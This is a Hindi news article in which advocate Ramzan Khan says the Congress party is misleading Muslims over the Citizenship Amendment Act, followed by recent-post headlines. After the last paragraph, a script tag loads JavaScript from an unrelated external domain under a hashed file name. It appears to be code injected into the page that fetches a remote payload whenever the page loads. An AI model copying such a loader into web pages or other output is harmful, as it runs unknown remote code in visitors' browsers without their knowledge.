Categories: हिमाचल

राजनीतिक हित साधने के लिए मुस्लिम समाज को गुमराह कर रही कांग्रेस: रमजान खान

<p>हिमाचल प्रदेश एवं&nbsp; भारत सरकार के सुप्रीम कोर्ट के अधिवक्ता रमजान खान ने प्रेसवार्ता में कहा कि कांग्रेस अपने राजनीतिक हितों को साधने के लिए मुस्लिम समाज को गुमराह करके उनका नकारात्मक इस्तेमाल कर रही है जबकि आम मुस्लिम समाज में नागरिकता संशोधन कानून के खिलाफ&nbsp; कोई रोष नहीं है। क्योंकि इस कानून में नागरिकता लेने का कोई प्रावधान नहीं है, जबकि नागरिकता देने का प्रावधान है। उन्होंने कहा कि जब सुप्रीम कोर्ट का निर्णय राम मंदिर पर आया, तब भी मुस्लिम समाज ने सुप्रीम कोर्ट के निर्णय का स्वागत करते हुए देश की एकता और अखंडता को बनाए रखा।</p>

<p>इसके बाद जब देश की संसद ने धारा 370 को हटाया तब भी मुस्लिम समाज ने संसद द्वारा बनाए गए निर्णय का सम्मान किया और देश की एकता और अखंडता को बनाए रखा। लेकिन एनआरसी और नागरिक संशोधन कानून के विषय में कांग्रेस ने अपने राजनीतिक हितों को साधने के लिए मुस्लिम समाज के कंधों पर बंदूक रखकर राजनीतिक हितों को साधने की कोशिश की है। जिसका कि हम कड़े शब्दों में निंदा एवं विरोध करते हैं। उन्होंने कहा कि मुस्लिम समाज इस बात को समझ रहा है कि कांग्रेस मुस्लिम समाज को पूरी दुनिया के सामने नकारात्मक दिखाने का प्रयास कर रही है जिसमें कि वह कामयाब नहीं होगी। 70 सालों में कांग्रेस ने मुस्लिमों का मात्र इस्तेमाल किया है जबकि उनके अधिकारों पर ध्यान नहीं दिया है। आज भी मुस्लिम समाज में शिक्षा का अभाव है 70 सालों में कांग्रेस, मुस्लिम समाज तक शिक्षा भी नहीं पहुंचा पाई है और अब मुस्लिम समुदाय के हितैषी होने का ढोंग रच रही है।</p>

<p>हिमाचल प्रदेश एवं&nbsp; भारत सरकार के सुप्रीम कोर्ट के अधिवक्ता रमजान खान ने कहा कि देश के मुस्लिम समाज का कांग्रेस द्वारा राजनीतिक रूप से इस्तेमाल किया जा रहा है। देश का मुस्लिम देश की एकता और अखंडता को बनाए रखने के लिए सरकार के साथ है, संसद द्वारा बनाए गए कानूनों के साथ है और सर्वोच्च न्यायालय पर मुस्लिम समाज पूरा विश्वास रखता है। सीएए नागरिकता देने का वाला कानून है, न कि नागरिकता लेने वाला। कांग्रेस द्वारा अपने राजनीति हित साधने के लिए मुस्लिम समाज के कंधों पर रखकर बंदूक चलाती है तो देश का मुस्लिम समाज कांग्रेस के खिलाफ सड़कों पर भी उतरेगा।</p>

<p>&nbsp;</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

Video: भारत ने कम दूरी की वायु रक्षा मिसाइल प्रणाली का किया सफल परीक्षण

  नई दिल्ली: भारत ने राजस्थान के पोखरण फायरिंग रेंज में बहुत ही कम दूरी…

1 hour ago

Himachal: जेपी नड्डा बोले- आजकल राहुल गांधी अर्बन नक्सल, देश को तोड़ने वालों की भाषा बोल रहे

  नाहन: भाजपा के राष्ट्रीय अध्यक्ष जेपी नड्डा ने हिमाचल प्रदेश के नाहन में आयोजित…

1 hour ago

राहुल गांधी शिवाजी महाराज की प्रतिमा का अनावरण करते हुए भाजपा पर हमलावर, बोले- संविधान बर्बाद कर शीश झुकाने का कोई मतलब नहीं

Kohlapur/Agencies: कांग्रेस नेता राहुल गांधी ने शनिवार को कोल्हापुर में मराठा साम्राज्य के संस्थापक छत्रपति…

2 hours ago

Mandi News: अवैध निर्माण पर शिकंजा, 225 नोटिसाें में 10 की सुनवाई

  illegal construction cases : मंडी नगर निगम द्वारा अवैध निर्माण के खिलाफ जारी किए…

4 hours ago

Himachal: हरियाणा में भाजपा लगाएगी हैट्रिक: अनुराग

Hamirpur: सांसद अनुराग सिंह ठाकुर ने नादौन के गलोड में भाजपा कार्यकर्ता सम्मेलन के दौरान…

4 hours ago